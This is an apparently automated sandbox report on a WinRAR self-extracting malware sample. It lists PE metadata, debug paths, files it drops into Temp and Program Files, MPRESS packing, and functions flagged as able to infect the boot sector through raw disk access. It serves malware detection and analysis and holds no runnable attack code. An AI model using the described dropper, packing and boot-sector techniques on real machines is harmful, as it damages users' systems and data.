Source: Window RecorderWindow detected: More than 3 window changes detected
Source: KeJ7Cl7flZ.exeStatic file information: File size 7922731 > 1048576
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KeJ7Cl7flZ.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: KeJ7Cl7flZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbQ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb@ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: Setup.exe, 0000000F.00000003.467283122.0000000000846000.00000004.00000001.sdmp, SibClr.dll.15.dr
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.263071378.000000000474B000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb/ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb8 source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb$ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbF source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\workspace\workspace_c\GiehH4yhJgg54_17\Release\GiehH4yhJgg54_17.pdb source: hjjgaa.exe
Source: Binary string: oleacc.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleacc.pdbE source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ntmarta.pdbL source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb[ source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdbI source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb< source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdbJ source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oledlg.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000011.00000000.294134315.0000000000082000.00000002.00020000.sdmp, setup.exe.15.dr
Source: Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oledlg.pdbO source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: 3.pdb] source: hjjgaa.exe
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: KeJ7Cl7flZ.exe
Source: Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: D:\workspace\workspace_c\GiehH4yhJgg54_17\Release\GiehH4yhJgg54_17.pdb- source: hjjgaa.exe
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleacc.pdb2 source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: D:\Projects\crxinstall\trunk\Release\spoofpref.pdb5 source: askinstall21.exe
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb. source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp
Source: Binary string: D:\Projects\crxinstall\trunk\Release\spoofpref.pdb source: askinstall21.exe
Source: Binary string: powrprof.pdbW source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KeJ7Cl7flZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeUnpacked PE file: 26.2.jg2_2qua.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeUnpacked PE file: 19.2.aliens.exe.3310000.5.unpack
Binary contains a suspicious time stampShow sources
Source: initial sampleStatic PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01262070 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,Sleep,1_2_01262070
Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4900203Jump to behavior
Source: KeJ7Cl7flZ.exeStatic PE information: real checksum: 0x0 should be: 0x795ef5
Source: 85F91A36E275562F.exe.19.drStatic PE information: real checksum: 0xcf3f0 should be:
Source: aliens.exe.17.drStatic PE information: real checksum: 0xcf3f0 should be:
Source: 002.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1479d3
Source: jg2_2qua.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x90533
Source: jg2_2qua.exe.26.drStatic PE information: real checksum: 0x0 should be: 0x90533
Source: Setup.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x40e92a
Source: KeJ7Cl7flZ.exeStatic PE information: section name: .didat
Source: jg2_2qua.exe.0.drStatic PE information: section name: .MPRESS1
Source: jg2_2qua.exe.0.drStatic PE information: section name: .MPRESS2
Source: jg2_2qua.exe.26.drStatic PE information: section name: .MPRESS1
Source: jg2_2qua.exe.26.drStatic PE information: section name: .MPRESS2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED4066 push ecx; ret 0_2_00ED4079
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED3344 push eax; ret 0_2_00ED3362
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01285B48 push ecx; ret 1_2_01285B5B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01283AF5 push ecx; ret 1_2_01283B08
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1008CAD5 push ecx; ret 1_2_1008CAE8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10082CFE push ecx; ret 1_2_10082D11
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEDF9A8 push ecx; ret 15_2_6FEDF9BB
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006E0E4 push eax; ret 17_2_0006E102
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006EBA6 push ecx; ret 17_2_0006EBB9
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10010579 push ecx; ret 19_2_1001058C
Source: initial sampleStatic PE information: section name: .MPRESS1 entropy: 7.99955674607
Source: initial sampleStatic PE information: section name: .MPRESS1 entropy: 7.99955674607

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d19_2_1001D370
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d19_2_1001D7E0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d19_2_1001DA70
Drops PE files to the document folder of the userShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile created: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeFile created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dllJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile created: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\Sibuia.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibClr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exeJump to dropped file
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exeJump to dropped file
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeFile created: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.logJump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d19_2_1001D370
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d19_2_1001D7E0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d19_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01261890 IsIconic,_memset,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,1_2_01261890
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_004375B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0128615A RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0128615A
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
